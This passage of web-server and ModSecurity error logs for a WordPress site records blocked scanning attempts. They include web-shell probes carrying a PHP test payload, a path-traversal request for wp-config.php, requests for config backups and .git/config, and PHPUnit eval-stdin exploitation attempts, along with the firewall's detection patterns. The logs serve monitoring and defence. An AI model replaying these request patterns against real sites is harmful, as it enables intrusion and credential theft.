"investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZDpgC8AqI8UkarxgFnLm5AAAAIY"], referer: http://investigacionperu.com/wp-22.php [Sat Apr 15 05:48:17.233617 2023] [autoindex:error] [pid 17478:tid 140541983414016] [client 172.187.192.35:48736] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/04/15 08:43:39 [error] 17412#17412: *1407512 access forbidden by rule, client: 94.23.133.43, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Apr 16 06:02:13.946260 2023] [:error] [pid 28244:tid 140040252401408] [client 152.89.196.77:33014] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZDvVtRh5nDpnyjLKYLHPwAAAAIs"] [Sun Apr 16 06:40:26.468160 2023] [autoindex:error] [pid 28439:tid 140040218830592] [client 49.51.72.155:34334] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 16 08:43:10.176007 2023] [autoindex:error] [pid 28439:tid 140040168474368] [client 170.106.116.71:39356] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 16 08:46:57.079172 2023] [:error] [pid 28242:tid 140040252401408] [client 152.89.196.77:39572] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-plugin-dependencies/vale.php"] [unique_id "ZDv8UQDC3mFd8OfD8IC_qQAAAAs"] [Sun Apr 16 11:52:46.063577 2023] [:error] [pid 28439:tid 140040202045184] [client 5.188.62.174:47510] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZDwn3sA6pSAPA8lFrWVUdAAAANE"] [Sun Apr 16 13:01:28.229161 2023] [:error] [pid 28244:tid 140040185259776] [client 5.188.62.76:49912] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZDw3-Bh5nDpnyjLKYLHWGwAAAJM"] [Sun Apr 16 19:28:32.107544 2023] [:error] [pid 28439:tid 140040294364928] [client 193.56.29.190:38546] [client 193.56.29.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZDySsMA6pSAPA8lFrWVhZwAAAMY"] [Sun Apr 16 19:28:32.537472 2023] [:error] [pid 28242:tid 140040380565248] [client 193.56.29.190:38548] [client 193.56.29.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZDySsADC3mFd8OfD8IDFzgAAAAQ"] [Sun Apr 16 19:45:52.438543 2023] [:error] [pid 28244:tid 140040260794112] [client 193.56.29.190:39328] [client 193.56.29.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZDyWwBh5nDpnyjLKYLHdPwAAAIo"] [Sun Apr 16 19:45:52.446434 2023] [:error] [pid 28439:tid 140040160081664] [client 193.56.29.190:39330] [client 193.56.29.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZDyWwMA6pSAPA8lFrWVh7gAAANY"] [Sun Apr 16 19:46:05.933715 2023] [:error] [pid 28439:tid 140040285972224] [client 193.56.29.190:39352] [client 193.56.29.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZDyWzcA6pSAPA8lFrWVh8wAAAMc"] [Sun Apr 16 19:46:06.251671 2023] [:error] [pid 28243:tid 140040252401408] [client 193.56.29.190:39356] [client 193.56.29.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZDyWzi_Zfw7-ywQLRXsQJAAAAEs"] [Sun Apr 16 21:03:36.154830 2023] [:error] [pid 28439:tid 140040294364928] [client 152.89.196.77:42594] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_e.php"] [unique_id "ZDyo-MA6pSAPA8lFrWVkBQAAAMY"] [Mon Apr 17 00:56:04.737736 2023] [:error] [pid 28244:tid 140040269186816] [client 152.89.196.77:53358] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_e.php"] [unique_id "ZDzfdBh5nDpnyjLKYLHi_wAAAIk"] [Mon Apr 17 05:53:39.922413 2023] [autoindex:error] [pid 1269:tid 139919867459328] [client 20.51.230.27:39400] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Apr 17 06:30:20.303674 2023] [:error] [pid 828:tid 139919917815552] [client 5.188.62.76:41084] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZD0tzBuDtTcy96wuGRnT4wAAAEY"] [Mon Apr 17 06:44:06.895823 2023] [autoindex:error] [pid 829:tid 139919934600960] [client 43.130.57.227:41634] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Apr 17 16:08:55.663302 2023] [:error] [pid 828:tid 139919783532288] [client 128.199.15.107:41542] [client 128.199.15.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZD21ZxuDtTcy96wuGRnanwAAAFY"] [Mon Apr 17 16:08:56.296489 2023] [:error] [pid 828:tid 139919850673920] [client 128.199.15.107:41544] [client 128.199.15.107] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZD21aBuDtTcy96wuGRnaoAAAAE4"] [Mon Apr 17 16:08:56.970147 2023] [:error] [pid 828:tid 139919884244736] [client 128.199.15.107:41546] [client 128.199.15.107] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZD21aBuDtTcy96wuGRnaoQAAAEo"] [Tue Apr 18 02:12:04.166825 2023] [:error] [pid 3934:tid 139919833888512] [client 5.188.62.76:42394] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZD5CxPqe7CtC7O7V5J454AAAANA"] [Tue Apr 18 10:17:30.849456 2023] [autoindex:error] [pid 15059:tid 140504494737152] [client 20.40.51.187:38022] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Apr 18 18:27:25.757735 2023] [:error] [pid 25867:tid 140602817582848] [client 5.188.62.26:38096] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZD8nXe1OHvyXHqRSu64SMwAAAM4"] 2023/04/18 20:03:12 [error] 25853#25853: *13871 access forbidden by rule, client: 172.104.88.16, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/04/18 21:52:01 [error] 25853#25853: *19772 access forbidden by rule, client: 172.104.88.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Apr 19 02:36:03.081913 2023] [:error] [pid 25738:tid 140602825975552] [client 5.188.62.76:36368] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZD-Z43Ce9_uKZuXyXARhPwAAAA0"] [Wed Apr 19 16:28:09.436110 2023] [autoindex:error] [pid 7292:tid 140227720963840] [client 20.127.77.103:50764] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 19 20:38:19.863467 2023] [:error] [pid 7292:tid 140227960297216] [client 5.188.62.76:34400] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZECXi9Rwg-ZZOzPx6wV3dgAAAIM"] [Wed Apr 19 20:39:22.061866 2023] [:error] [pid 7690:tid 140227729356544] [client 115.75.106.220:34436] [client 115.75.106.220] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZECXytmBWZM2joBbAHE8FQAAANY"] [Thu Apr 20 17:24:04.945343 2023] [:error] [pid 21026:tid 140157080508160] [client 5.188.62.174:45758] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEG7hFYihxYZNQWnsZyx7wAAAJU"] [Thu Apr 20 17:24:07.128752 2023] [:error] [pid 21025:tid 140157189613312] [client 5.188.62.174:45762] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEG7h4Vx7qXBNtLvg-CXUQAAAEg"] [Sat Apr 22 07:13:32.358164 2023] [:error] [pid 31408:tid 139952910198528] [client 5.188.62.26:42950] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEPPbJiuaoNVgUVrFgxI5AAAAM8"] [Sat Apr 22 11:14:50.662649 2023] [autoindex:error] [pid 31208:tid 139952977340160] [client 20.109.44.217:39998] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Apr 22 19:12:30.504088 2023] [autoindex:error] [pid 31408:tid 139952985732864] [client 49.51.187.248:44322] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 23 00:25:43.058014 2023] [:error] [pid 31408:tid 139952868235008] [client 5.188.62.174:35978] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] 